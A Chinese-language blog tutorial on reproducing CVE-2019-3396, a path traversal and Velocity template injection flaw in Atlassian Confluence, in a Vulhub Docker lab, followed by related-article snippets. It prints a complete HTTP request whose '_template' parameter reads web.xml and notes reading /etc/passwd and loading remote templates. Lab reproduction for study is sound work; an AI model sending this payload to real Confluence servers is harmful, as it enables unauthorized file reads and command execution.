利用Vulnhub复现漏洞 - Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)
Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)
- Vulnhub官方复现教程
- 漏洞原理
- 复现漏洞
- 启动环境
- 漏洞复现
Vulnhub官方复现教程
https://vulhub.org/#/environments/confluence/CVE-2019-3396/
漏洞原理
Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。
参考资料:
- https://paper.seebug.org/884/
- https://jira.atlassian.com/browse/CONFSERVER-57974
复现漏洞
启动环境
https://blog.csdn.net/JiangBuLiu/article/details/93853056
进入路径为
cd /root/vulhub/confluence/CVE-2019-3396
搭建及运行漏洞环境:
docker-compose build && docker-compose up -d
环境搭建时间,略久- -建议站起来旋转跳跃一会:)
环境启动后,访问http://your-ip:8090
会进入安装引导,选择“Trial installation”,之后会要求填写license key。点击“Get an evaluation license”,去Atlassian官方申请一个Confluence Server的测试证书(不要选择Data Center和Addons):
[外链图片转存失败(img-FF9I0fFU-1562319422385)(https://vulhub.org/vulhub/confluence/CVE-2019-3396/1.png)]
(由于我没有梯子(2019年6月几乎大家的都失效了)不能用谷歌邮箱了,懒得注册,所以这个就不复现了)
然后点击Next安装即可。这一步小内存VPS可能安装失败或时间较长(建议使用4G内存以上的机器进行安装与测试),请耐心等待。
如果提示填写cluster node,路径填写/home/confluence
即可:
[外链图片转存失败(img-pXTOZ6HZ-1562319422386)(https://vulhub.org/vulhub/confluence/CVE-2019-3396/4.png)]
后续可能要求你填写数据库账号密码,选择postgres数据库,地址为db
,账号密码均为postgres
:
[外链图片转存失败(img-GzCNEbtd-1562319422386)(https://vulhub.org/vulhub/confluence/CVE-2019-3396/5.png)]
漏洞复现
发送如下数据包,即可读取文件web.xml
:
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 176{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}
[外链图片转存失败(img-MAn4NxmT-1562319422386)(https://vulhub.org/vulhub/confluence/CVE-2019-3396/6.png)]
6.12以前的Confluence没有限制文件读取的协议和路径,我们可以使用file:///etc/passwd
来读取文件,也可以通过https://...
来加载远程文件。
该文件是一个Velocity模板,我们可以通过模板注入(SSTI)来执行任意命令:
[外链图片转存失败(img-2TBi8xdy-1562319422387)(https://vulhub.org/vulhub/confluence/CVE-2019-3396/7.png)]
利用Vulnhub复现漏洞 - Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)相关推荐
- 【vulhub】Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)复现与反思!
特征 1.8090端口 2.confluence图标(如图所示) 搭建环境 搭建confluence看这4篇教程,该cve搭建是用Confluence Server, 但是tm就是没有Confluen ...
- Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)莫得复现
漏洞简介 Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行 ...
- Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)
目录 Confluence 漏洞背景 漏洞影响版本 环境搭建 漏洞复现 任意文件读取
- Atlassian Confluence OGNL表达式注入代码执行漏洞(CVE-2021-26084)
环境搭建: 使用vulhub,进入文件夹启动环境: docker-compose up -d 环境启动后,访问http://your-ip:8090即可进入安装向导,参考CVE-2019-3396这个 ...
- [ web 漏洞篇 ] 常见web漏洞总结之 RCE 远程代码 / 命令执行漏洞总结
- Nexus Repository Manager 3 远程命令执行漏洞 CVE-2019-7238
目录 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 端口设置 Vulnhub官方复现教程 https://vulhub.org/#/environments/nexus/CVE- ...
- 远程命令执行漏洞与远程代码执行漏洞33333
远程命令执行漏洞的概念 远程命令执行漏洞,指用户通过浏览器提交执行操作命令, 由于服务器端,没有针对执行函数做过滤,就执行了恶意命令 远程代码执行漏洞概念 代码执行漏洞也叫代码注入漏洞,指用户通过浏览 ...
- Tomcat- AJP协议文件读取/命令执行漏洞(CVE-2020-1938 / CNVD-2020-10487)
CVE-2020-1938 1.概述 1.1 tomcat概述 1.2 gostcat概述 - 漏洞概述 2. 漏洞成因 2.1 前置基础 2.1.1 Tomcat Connector(连接器) 2. ...
- 命令执行漏洞之远程命令执行和系统命令执行
渗透学习 命令执行漏洞 文章目录 渗透学习 前言 *本文只做学习用途,严禁利用本文提到的技术进行非法攻击,否则后果自负,本人不承担任何责任.* 一.命令执行漏洞概述 二.实验步骤 1.管道符号 2.远 ...
最新文章
- word怎么根据点画曲线_圆锥曲线联解公式
- c#小软件(SaveClassic)开发手记--(3)基础类(MP3播放类MP3Player)
- dart 语言是jvm_Dart编译技术在服务端的探索和应用
- 段寄存器和8种地址寻址方式
- HDU - 7031 Power Station of Art 思维 + 二分图模型
- phpcmsV9文章页时间 - 踩坑篇
- EfficientNetV2:训练速度快了5~10x,更小,更快,精度更高的EfficientNet
- 查询oracle数据库里面所有的表名
- xcode swift_CocoaPods Swift XCode教程
- 【英语天天读】Develop Your Own Helping Rituals
- CF991E Bus Number
- 6.3 交通工具类
- VS2017设置透明主题
- 目标检测经典论文——YOLOv3论文翻译:YOLOv3: An Incremental Improvement(YOLOv3:增量式的改进)
- 荣耀4a鸿蒙,赵明:6 月起芯片供应将全面恢复,荣耀未来会考虑用华为鸿蒙系统...
- 如果你想要做好抖音直播间需要注意的其他事项(三)
- 从电路交换到分组交换——TDM、ATM
- Java eclipse控制台按任意键返回主菜单 控制台清屏
- iOS地图定位导航与大头针的简单使用
- 医院IPTV系统搭建 智慧医疗解决方案